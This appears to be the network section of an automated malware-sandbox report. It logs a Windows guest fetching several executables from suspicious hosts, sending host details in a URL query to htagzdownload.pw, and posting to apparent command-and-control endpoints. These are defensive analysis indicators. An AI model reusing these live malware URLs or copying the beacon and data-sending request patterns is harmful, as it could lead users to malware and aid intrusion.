Host: www.mrwenshen.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 05 Nov 2021 00:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.mrwenshen.com/askinstall59.exe
HEAD
301
http://dataonestorage.com/search_hyperfs_204.exe
REQUEST
RESPONSE
BODY
HEAD /search_hyperfs_204.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: dataonestorage.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.1
Date: Fri, 05 Nov 2021 00:07:23 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://dataonestorage.com/search_hyperfs_204.exe
HEAD
200
http://privacytoolzfor-you6000.top/downloads/toolspab2.exe
REQUEST
RESPONSE
BODY
HEAD /downloads/toolspab2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: privacytoolzfor-you6000.top
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT
ETag: "55a00-5cfff6c24c825"
Accept-Ranges: bytes
Content-Length: 350720
Connection: close
Content-Type: application/octet-stream
HEAD
200
http://eguntong.com/pub33.exe
REQUEST
RESPONSE
BODY
HEAD /pub33.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: eguntong.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:23 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Thu, 04 Nov 2021 23:44:02 GMT
ETag: "55c00-5cfff19f5bd79"
Accept-Ranges: bytes
Content-Length: 351232
Connection: close
Content-Type: application/x-msdos-program
HEAD
302
http://www.mrwenshen.com/askhelp59/askinstall59.exe
REQUEST
RESPONSE
BODY
HEAD /askhelp59/askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.mrwenshen.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 05 Nov 2021 00:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.mrwenshen.com/askinstall59.exe
HEAD
200
http://privacytoolzfor-you6000.top/downloads/toolspab2.exe
REQUEST
RESPONSE
BODY
HEAD /downloads/toolspab2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: privacytoolzfor-you6000.top
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT
ETag: "55a00-5cfff6c24c825"
Accept-Ranges: bytes
Content-Length: 350720
Connection: close
Content-Type: application/octet-stream
HEAD
200
http://www.mrwenshen.com/askinstall59.exe
REQUEST
RESPONSE
BODY
HEAD /askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.mrwenshen.com
Content-Length: 0
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:06:46 GMT
Content-Type: application/octet-stream
Content-Length: 1519104
Last-Modified: Thu, 04 Nov 2021 06:13:06 GMT
Connection: keep-alive
ETag: "618379f2-172e00"
Accept-Ranges: bytes
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:23 GMT
Date: Fri, 05 Nov 2021 00:07:23 GMT
Connection: keep-alive
HEAD
200
http://www.hzradiant.com/askinstall42.exe
REQUEST
RESPONSE
BODY
HEAD /askinstall42.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.hzradiant.com
Content-Length: 0
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
GET
200
http://privacytoolzfor-you6000.top/downloads/toolspab2.exe
REQUEST
RESPONSE
BODY
GET /downloads/toolspab2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: privacytoolzfor-you6000.top
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT
ETag: "55a00-5cfff6c24c825"
Accept-Ranges: bytes
Content-Length: 350720
Connection: close
Content-Type: application/octet-stream
GET
200
http://eguntong.com/pub33.exe
REQUEST
RESPONSE
BODY
GET /pub33.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: eguntong.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Thu, 04 Nov 2021 23:44:02 GMT
ETag: "55c00-5cfff19f5bd79"
Accept-Ranges: bytes
Content-Length: 351232
Connection: close
Content-Type: application/x-msdos-program
GET
302
http://www.mrwenshen.com/askhelp59/askinstall59.exe
REQUEST
RESPONSE
BODY
GET /askhelp59/askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.mrwenshen.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 05 Nov 2021 00:06:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.mrwenshen.com/askinstall59.exe
GET
200
http://www.mrwenshen.com/askinstall59.exe
REQUEST
RESPONSE
BODY
GET /askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.mrwenshen.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:06:47 GMT
Content-Type: application/octet-stream
Content-Length: 1519104
Last-Modified: Thu, 04 Nov 2021 06:13:06 GMT
Connection: keep-alive
ETag: "618379f2-172e00"
Accept-Ranges: bytes
GET
302
http://www.hzradiant.com/askhelp42/askinstall42.exe
REQUEST
RESPONSE
BODY
GET /askhelp42/askinstall42.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.hzradiant.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.hzradiant.com/askinstall42.exe
GET
200
http://www.hzradiant.com/askinstall42.exe
REQUEST
RESPONSE
BODY
GET /askinstall42.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.hzradiant.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 517
Connection: keep-alive
X-Powered-By: PHP/5.6.40
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:24 GMT
Date: Fri, 05 Nov 2021 00:07:24 GMT
Connection: keep-alive
GET
301
http://dataonestorage.com/search_hyperfs_204.exe
REQUEST
RESPONSE
BODY
GET /search_hyperfs_204.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: dataonestorage.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.1
Date: Fri, 05 Nov 2021 00:07:26 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://dataonestorage.com/search_hyperfs_204.exe
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:26 GMT
Date: Fri, 05 Nov 2021 00:07:26 GMT
Connection: keep-alive
GET
301
http://dataonestorage.com/search_hyperfs_204.exe
REQUEST
RESPONSE
BODY
GET /search_hyperfs_204.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: dataonestorage.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.1
Date: Fri, 05 Nov 2021 00:07:27 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://dataonestorage.com/search_hyperfs_204.exe
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:27 GMT
Date: Fri, 05 Nov 2021 00:07:27 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:30 GMT
Date: Fri, 05 Nov 2021 00:07:30 GMT
Connection: keep-alive
GET
302
http://htagzdownload.pw/SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22BumperWw%22,%22ip%22:%22%22,%22country%22:%22KR%22,%22DateTime%22:%222021-11-05%2012:47%22,%22Device%22:%22TEST22-PC%22,%22PCName%22:%22test22%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lylaShare1_folderlyla1_foldershare_goodchannel_registry_goodchannel_installrox2_BumperWw%22,%22Os%22:%22WIN7%22,%22Browser%22:%22Internet%20explorer%22%7D
REQUEST
RESPONSE
BODY
GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22BumperWw%22,%22ip%22:%22%22,%22country%22:%22KR%22,%22DateTime%22:%222021-11-05%2012:47%22,%22Device%22:%22TEST22-PC%22,%22PCName%22:%22test22%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lylaShare1_folderlyla1_foldershare_goodchannel_registry_goodchannel_installrox2_BumperWw%22,%22Os%22:%22WIN7%22,%22Browser%22:%22Internet%20explorer%22%7D HTTP/1.1
Host: htagzdownload.pw
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 05 Nov 2021 00:07:32 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=3b1eef88a8b88dff222ad3bd25da3c94|175.208.134.150|1636070852|1636070852|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Location: 1
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:31 GMT
Date: Fri, 05 Nov 2021 00:07:31 GMT
Connection: keep-alive
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:33 GMT
Date: Fri, 05 Nov 2021 00:07:33 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:34 GMT
Date: Fri, 05 Nov 2021 00:07:34 GMT
Connection: keep-alive
GET
200
http://45.133.1.182/proxies.txt
REQUEST
RESPONSE
BODY
GET /proxies.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.182
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 Nov 2021 12:33:30 GMT
ETag: "9cf-5cff5bbedf3a3"
Accept-Ranges: bytes
Content-Length: 2511
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
POST
200
http://212.192.241.15/service/communication.php
REQUEST
RESPONSE
BODY
POST /service/communication.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 25
Host: 212.192.241.15
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:39 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://45.133.1.182/proxies.txt
REQUEST
RESPONSE
BODY
GET /proxies.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.182
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 Nov 2021 12:33:30 GMT
ETag: "9cf-5cff5bbedf3a3"
Accept-Ranges: bytes
Content-Length: 2511
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
POST
0
http://212.192.241.15/service/communication.php
REQUEST
RESPONSE
BODY
POST /service/communication.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 73
Host: 212.192.241.15
GET
200
http://186.2.171.3/seemorebty/il.php?e=jg1_1faf
REQUEST
RESPONSE
BODY
GET /seemorebty/il.php?e=jg1_1faf HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 186.2.171.3
HTTP/1.1 200 OK
Server: ddos-guard
Connection: keep-alive
Keep-Alive: timeout=60
Set-Cookie: __ddg1=oz7z6SPLbSnm54RJdfTe; Domain=.171.3; HttpOnly; Path=/; Expires=Sat, 05-Nov-2022 00:07:43 GMT
Date: Fri, 05 Nov 2021 00:06:56 GMT
Upgrade: h2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:43 GMT
Date: Fri, 05 Nov 2021 00:07:43 GMT
Connection: keep-alive
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 142.250.207.78 | 8 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
142.250.207.78 | 192.168.56.103 | 0 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49189 192.243.59.12:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | f4:ad:de:a9:4c:23:d2:d3:48:4d:b8:62:d2:58:82:29:82:6e:db:bd |
TLSv1 192.168.56.103:49209 162.159.135.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.103:49184 162.0.210.44:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf |
TLSv1 192.168.56.103:49190 192.243.59.12:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | f4:ad:de:a9:4c:23:d2:d3:48:4d:b8:62:d2:58:82:29:82:6e:db:bd |
TLSv1 192.168.56.103:49208 162.0.210.44:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf |
TLSv1 192.168.56.103:49166 162.0.210.44:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf |
TLSv1 192.168.56.103:49179 162.0.210.44:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf |
TLSv1 192.168.56.103:49215 88.99.66.31:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
TLSv1 192.168.56.103:49230 162.159.135.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.103:49237 104.21.59.236:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | b0:c4:b1:fe:56:fd:ec:99:f4:dc:0f:3f:36:63:53:f7:6c:3a:26:7b |
TLSv1 192.168.56.103:49235 34.117.59.81:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63 |
TLSv1 192.168.56.103:49236 34.117.59.81:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63 |
TLSv1 192.168.56.103:49232 162.159.135.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.103:49221 88.99.66.31:443 | None | None | None |
TLSv1 192.168.56.103:49246 172.67.204.112:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamec.com | ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1 |
TLSv1 192.168.56.103:49238 104.21.72.228:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamef.com | 5c:36:e8:6e:6d:65:76:95:76:a5:7d:b3:47:fe:54:fe:f3:71:15:1b |
TLSv1 192.168.56.103:49285 162.159.135.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.103:49252 172.67.204.112:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamec.com | ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1 |
TLSv1 192.168.56.103:49262 172.67.204.112:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamec.com | ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1 |
TLSv1 192.168.56.103:49258 172.67.204.112:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamec.com | ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1 |
TLSv1 192.168.56.103:49256 172.67.204.112:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamec.com | ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1 |
TLSv1 192.168.56.103:49267 172.67.204.112:443 | C=US, O=Let's Encrypt, CN=R3 | CN=*.gogamec.com | ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1 |
